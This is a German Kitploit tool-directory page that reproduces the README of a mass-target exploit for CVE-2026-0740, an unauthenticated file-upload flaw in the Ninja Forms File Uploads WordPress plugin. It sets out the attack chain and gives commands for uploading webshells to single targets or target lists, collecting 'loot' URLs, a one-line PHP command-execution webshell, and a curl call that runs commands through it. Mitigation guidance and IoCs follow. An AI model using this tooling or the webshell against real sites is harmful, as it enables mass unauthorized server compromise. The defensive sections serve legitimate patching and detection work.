Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2026-0740-mass — PoC für CVE-2026-0740: Ninja Forms File Uploads <= 3.3.26 — Unauthentifizierter beliebiger Datei-Upload, der zu RCE führen kann. | Kitploit
Tools/GitHubGitHub/exdev994/cve-2026-0740-mass
Payload-GenerierungSchwachstellenanalyseExploitationWebanwendungs-ExploitationPenetrationstestsRed Teaming
GitHubexdev994/cve-2026-0740-mass

CVE-2026-0740-mass

PoC für CVE-2026-0740: Ninja Forms File Uploads <= 3.3.26 — Unauthentifizierter beliebiger Datei-Upload, der zu RCE führen kann.

Repository anzeigen
11vor 1 MonatNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2026-0740 — Mass-Target Exploit Engine

Autor: 0xNuts
Mitwirkender: Cursor
Repository: https://github.com/ExDev994/CVE-2026-0740-mass

PoC für CVE-2026-0740: Ninja Forms File Uploads <= 3.3.26 — Unauthenticated Arbitrary File Upload, der zu RCE führen kann.

Die ursprüngliche Schwachstelle wurde von Sélim Lanouar (@whattheslime) entdeckt. Die PoC-Mass-Target-Engine wurde von 0xNuts unter Mitwirkung von Cursor entwickelt.


Disclaimer

Dieses Repository dient ausschließlich der Sicherheitsforschung und defensiven Zwecken (autorisierte Pentests, Red Team mit schriftlicher Genehmigung, Patch-Validierung und Härtung).

  • Nicht gegen Systeme ohne ausdrückliche Genehmigung des Eigentümers verwenden.
  • Der Autor übernimmt keine Verantwortung für den Missbrauch dieser Informationen.

Zusammenfassung der Schwachstelle

Das Plugin Ninja Forms - File Uploads für WordPress ist in allen Versionen bis einschließlich 3.3.26 anfällig für nicht authentifizierte beliebige Datei-Uploads (unauthenticated arbitrary file upload).

Angriffskette:

  1. Ein nicht authentifizierter Angreifer erhält ein Upload-Nonce über die AJAX-Action nf_fu_get_new_nonce mit einer beliebigen field_id.
  2. Der Handler nf_fu_upload validiert die Dateierweiterung des Uploads (z. B. image.jpg), der Angreifer kann jedoch den Ziel-Dateinamen über einen POST-Parameter (image_jpg) überschreiben.
  3. Der Ziel-Dateiname wird ohne ausreichende Bereinigung an move_uploaded_file() übergeben → beliebige Erweiterung + Path Traversal (../).

Vollständiger Patch verfügbar ab Version 3.3.27+.


Voraussetzungen

  • Python 3.10+
  • Ziel hat die Plugins Ninja Forms und Ninja Forms - File Uploads (<= 3.3.26) installiert und aktiviert
  • Kein bereits vorhandenes Formular oder Upload-Feld erforderlich

Installation der Abhängigkeiten

Dieses Repository enthält nur CVE-2026-0740.py und README.md. Abhängigkeiten manuell installieren:

root@kitploit:~
python3 -m venv .venv
source .venv/bin/activate          # Linux/macOS/WSL
# .venv\Scripts\activate           # Windows

pip install httpx==0.28.1 socksio==1.0.0

Verwendung

CLI-Hilfe

root@kitploit:~
python3 CVE-2026-0740.py -h

Argumentoptionen

Hinweis: Es muss genau eine der Optionen -t oder -f verwendet werden.


Einzelziel-Modus

root@kitploit:~
python3 CVE-2026-0740.py -t http://target.com --shell shell.php

Mit explizitem Path Traversal:

root@kitploit:~
python3 CVE-2026-0740.py -t http://target.com --shell shell.php -d ../../../shell.php

Massenziel-Modus

Datei target.txt erstellen:

root@kitploit:~
http://site1.com
https://site2.com
10.0.0.5
# baris komentar diabaikan

Ausführen:

root@kitploit:~
python3 CVE-2026-0740.py -f target.txt --shell shell.php

Mit Worker-Tuning und Loot-Ausgabe:

root@kitploit:~
python3 CVE-2026-0740.py -f target.txt --shell shell.php -w 50 -o loot.txt

Die URLs erfolgreich hochgeladener Shells werden in die Loot-Datei geschrieben (Anhänge-Modus).


Beispiel für eine minimale Webshell

root@kitploit:~
echo '<?php system($_GET["cmd"] ?? ""); ?>' > shell.php

Nach erfolgreichem Upload zeigt das Skript die Shell-URL an. Verifizieren (nur auf Lab-/autorisierten Zielen):

root@kitploit:~
curl "http://target.com/wp-content/shell.php?cmd=id"

Plugin-Versionserkennung (optional)

root@kitploit:~
httpx -fr -u http://target.com -ms 'file_uploads_nfpluginsettings-js' -er 'nfpluginsettings\.js\?ver=[\d\.]+'

Behebungsmaßnahmen (Mitigation)

1. Plugin aktualisieren (höchste Priorität)

Aktualisieren Sie Ninja Forms - File Uploads umgehend auf 3.3.27 oder neuer.

  • WordPress Admin → Plugins → Version von Ninja Forms - File Uploads prüfen
  • Falls kein automatisches Update verfügbar ist, die gepatchte Version vom offiziellen Anbieter herunterladen

2. Patch verifizieren

Nach dem Update:

  • Sicherstellen, dass die Plugin-Version >= 3.3.27 ist
  • Den Endpunkt wp-admin/admin-ajax.php mit den Actions nf_fu_get_new_nonce / nf_fu_upload testen — beliebige Uploads müssen abgelehnt werden
  • Erneut mit einem Scanner (Nuclei-Template CVE-2026-0740) scannen, um zu bestätigen

3. Kompromittierungsindikatoren (IoC)

WordPress-Upload-Verzeichnisse prüfen:

root@kitploit:~
wp-content/uploads/ninja-forms/tmp/
wp-content/uploads/ninja-forms/
wp-content/

Nach fremden Dateien suchen: .php, .pht, .phtml, .phar, .html, .svg, .js, die nicht vorhanden sein sollten.

Zusätzlich Webserver-Logs auf Anfragen an:

root@kitploit:~
/wp-admin/admin-ajax.php

mit den Parametern action=nf_fu_get_new_nonce oder action=nf_fu_upload prüfen.

4. Zusätzliche Härtung

  • WAF / Rate Limiting auf /wp-admin/admin-ajax.php, um Mass-Upload-Missbrauch zu blockieren

  • PHP-Ausführung im Verzeichnis wp-content/uploads/ über die Webserver-Konfiguration deaktivieren:

    Apache (.htaccess in uploads/):

    root@kitploit:~
    <FilesMatch "\.php$">
      Require all denied
    </FilesMatch>
    

    Nginx:

    root@kitploit:~
    location ~* /wp-content/uploads/.*\.php$ {
        deny all;
    }
    
  • Least Privilege: Sicherstellen, dass die Upload-Dateiberechtigungen für den Webserver außerhalb der erforderlichen Verzeichnisse nicht beschreibbar sind

  • Monitoring: Alerts bei POST-Anfragen an admin-ajax.php mit nf_fu_*-Actions von fremden IPs oder bei hohem Volumen

  • Backup & Incident Response: Falls IoCs gefunden werden, Site isolieren, DB-/Admin-Zugangsdaten rotieren, andere Plugins/Themes auditieren

5. Falls das Plugin nicht verwendet wird

Deaktivieren und entfernen Sie das Plugin Ninja Forms - File Uploads, wenn die Upload-Funktion nicht benötigt wird.


Referenzen

  • CVE-2026-0740
  • Lexfo — Technical Deep Dive
  • Wordfence — 50,000 WordPress Sites Affected
  • GHSA-v8wq-rjpf-669f
  • Nuclei Template
Tool herunterladen
Vektor / Erweiterung<= 3.3.243.3.253.3.263.3.27
Path traversal (../)PASS---
.phpPASS---
.phtml, .pharPASSPASS--
.phtPASSPASSPASS-
.html, .svg, .jsPASSPASSPASS-
FlagFunktion
-t, --targetEinzelziel (einzelne URL)
-f, --targets-file.txt-Datei mit Zielliste (eine URL pro Zeile)
--shellHochzuladende Payload/Webshell (erforderlich)
-d, --destZiel-Path-Traversal (Standard: ../../../)
-w, --workersAnzahl gleichzeitiger Threads (Standard: 20)
-o, --outputLoot-Datei für erfolgreiche Shell-URLs (Standard: results.txt)
-x, --proxyHTTP-Proxy (z. B. http://127.0.0.1:8080)
-H, --headersBenutzerdefinierte Header (Format: 'Header: Value')
--timeoutHTTP-Timeout in Sekunden (Standard: 10)